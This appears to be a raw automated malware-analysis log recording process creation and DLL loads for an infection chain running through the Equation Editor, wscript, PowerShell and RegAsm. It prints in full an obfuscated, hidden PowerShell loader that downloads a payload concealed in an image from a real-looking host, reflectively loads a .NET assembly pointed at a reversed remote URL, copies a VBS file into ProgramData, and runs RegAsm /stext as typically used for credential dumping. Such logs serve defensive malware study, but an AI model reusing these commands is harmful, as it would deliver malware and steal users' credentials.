gTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMwDgTrevDgTreDcDgTreOQDgTre3DgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreODgTreDgTre4DgTreDIDgTreMDgTreDgTreyDgTreDkDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDg Jump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe Process created: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1312 --field-trial-handle=1164,i,12295788173595172978,5315075123005719965,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 Jump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029', 'https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.FFBK/0209/69.242.571.701//:ptth' , '1' , 'C:\ProgramData\' , 'sabelianos','RegAsm',''))} }" Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C copy *.vbs "C:\ProgramData\sabelianos.vbs" Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe" Jump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe Process created: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1504 --field-trial-handle=1320,i,11995020747881027354,7636769829744668384,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\huqveuwntqlrmlybthcenbzzriklfmudg"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\rwdne"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\briyfxzid"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\jcpa"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\twutehs"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\wyzefsckuj"
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe Process created: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1492 --field-trial-handle=1312,i,12721759368113981321,9650863181706294674,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe Process created: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1448 --field-trial-handle=1312,i,8048391771101427258,3488663973075303133,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe Process created: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1416 --field-trial-handle=1212,i,15387615927566497572,6828730572207653402,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe Process created: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1356 --field-trial-handle=1136,i,61898105425524230,6329090133456978348,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe Process created: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1516 --field-trial-handle=1372,i,7040727732145984363,3593676648702084306,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe Process created: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=820 --field-trial-handle=1404,i,17451326606051937967,12013872481303463395,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe Process created: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1484 --field-trial-handle=1328,i,9707891231919903179,15563385993840059589,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: wow64win.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: wow64cpu.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: msi.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: cryptsp.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: rpcrtremote.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: dwmapi.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: version.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: secur32.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: winhttp.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: webio.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: winnsi.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: dnsapi.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: nlaapi.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: propsys.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: ntmarta.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: wow64win.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: wow64cpu.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: dwmapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: scrrun.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: activeds.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: adsldpc.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: dsrole.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: browcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: logoncli.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: samcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: wkscli.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: cscapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: winsta.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: davhlpr.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: webio.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: rpcrtremote.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: bcrypt.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: credssp.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wow64win.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wow64cpu.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rpcrtremote.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcrypt.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wow64win.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wow64cpu.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rpcrtremote.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcrypt.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: webio.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: credssp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: wow64win.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: wow64cpu.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: winbrand.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wow64win.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wow64cpu.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: winmm.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: samcli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: msacm32.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sfc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sfc_os.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: dwmapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: mpr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: shcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: iphlpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: winnsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: rstrtmgr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ncrypt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: bcrypt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: secur32.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: winhttp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: webio.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: dnsapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: nlaapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: rasadhlp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: rpcrtremote.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: windowscodecs.dll
